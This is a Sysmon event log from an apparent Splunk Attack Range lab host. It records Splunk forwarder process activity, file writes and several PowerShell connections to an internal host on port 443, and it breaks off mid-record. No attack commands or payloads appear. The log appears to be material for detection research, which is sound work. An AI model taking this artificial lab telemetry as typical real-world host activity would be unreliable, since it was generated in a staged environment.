15:00:17.394{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342547Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:17.394{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7301-613B-39B4-03000000C801}1932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342546Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:17.394{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7301-613B-39B4-03000000C801}1932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342545Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:17.388{B81B27B7-7301-613B-39B4-03000000C801}1932C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342566Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:18.573{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93E24F866B9D2DB0F9D51210ED6D09D3,SHA256=7CDEC9968CEDAA5E091D8F2878D0A8913E7291DE0D14B0585AA30F032C8FF71C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342565Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:18.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4D7FD5AA6DF587ED8DCE97CFD8A65828,SHA256=565628CE3F00EEBE785FDA104F4DBD5C7DED7238959CFF65775E8276E345DD2F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342564Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:18.394{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A3DB9C6E9D2BC1E509FA396349DAFFB,SHA256=F185D17E94DAB56CF456A2FC8A64C6A35157322A3B4FC64A9F51FAB762B2F988,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035342563Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:18.026{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7302-613B-3AB4-03000000C801}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342562Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:18.026{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342561Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:18.026{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342560Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:18.026{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342559Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:18.026{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342558Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:18.026{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-7302-613B-3AB4-03000000C801}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342557Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:18.026{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7302-613B-3AB4-03000000C801}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035342556Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:18.011{B81B27B7-7302-613B-3AB4-03000000C801}6836C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035342567Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:19.590{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3571C9AD25D4FCC26979E711BC22513,SHA256=71CC75BECCBE320CFD153A48D052A2789ED76B235E58E9D3E1E0FD1A7811C8A5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342568Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:20.609{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3D5956E63DD2867AF0FB2F236E94CB9,SHA256=19A6E81357F8932F28BE91EAED613096CC036AD9C54D59A83312B2B01CB3F04E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342569Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:21.624{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=848642348135A87A1E9F9312F3A446F1,SHA256=12AB298EB0B5B80C2665DE75207B0B8F1571AE5A77B7DDF7EF26F7304BAB6BBF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342571Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:22.625{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BADD3F5B5E1B4DA95B6AD8CEFDADA16,SHA256=31EE6A33838EEEAD3255D5A38B15226D82649CD6CD3CCB2EC7F2FF965E4533E0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342570Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:22.609{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0DFF995DF7BA7D5B0FD3ABD6A1D546C9,SHA256=D322ADD77A31041A360F6DDB0302DEA96E270433238B94E4662A6ABCB80C601C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342574Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:23.655{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F17F840ADA798B4AD51D696E9DC9B89,SHA256=CB14A2C4CA4D55EDDC5A8AD00C0A1F82B4FF96FD86A0AD8665B9FE5723B24F19,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342573Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:48.372{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52440-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342572Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:23.040{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342576Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:24.670{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=283577E9511EA60B49816BB67426008C,SHA256=BDAB0D4FF8738C2D3E11D78D2578E0E9185E9B155A065D0062C622FCEA077400,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342575Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:49.186{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52441-false10.0.1.12-8000- 23542300x800000000000000035342578Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:25.672{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=448942E6E35597971F33CC1DE762406F,SHA256=EDE76C680CF443C0CE07F61F7E6385C71B9F75EAB6B5F87E0A9CBD406AB5835F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342577Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:50.025{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52442-false10.0.1.12-8089- 23542300x800000000000000035342579Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:26.690{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A8C87C23AC88EE7162F7320AA057610A,SHA256=841E8D5DF30B654A6467DDF4A059A38497AE64E3CCC38E5EC3BF86580998C97A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342580Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:27.692{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E66DD975179264D5835877C2BA795C5C,SHA256=019888A44CB2AE0E015703A251958E735369D5B7468F77A6275C982A437D6866,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342582Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:28.722{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F7EE33DECDF36A9CA192F7E07346B8F5,SHA256=79BBA8710AD9351AA56615756815019D433A2243A9CFA0495AB21BEC2E5EC04A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342581Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:28.390{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=19753666FF9DDB6EE3CEF3C9F8A54AB3,SHA256=DE1DDED2C000B18B88FD46138897EFD4902AE933A94C853BC4C8C2E7629B26D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035342584Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:29.752{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13C0455D295D5707AA8B228DFAFE8F63,SHA256=217980C69B00BA415EA4981788D64FCD4A8B5B11A7439987FE81654BE7DF2266,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342583Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:54.387{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52443-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035342586Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:30.785{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCB3C6A67E6F4E80CB6F40A861EFED3E,SHA256=3DFBB5C5F1D688D8B5FC01F223FC689CED9F78E3098F071EF07929A29283A5D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035342585Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:55.090{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52444-false10.0.1.12-8000- 10341000x800000000000000035342604Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.819{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-730F-613B-3CB4-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342603Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.819{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342602Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.819{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035342601Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:00:31.819{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-730F-613B-3CB4-03000000C801}5344C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035342600Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 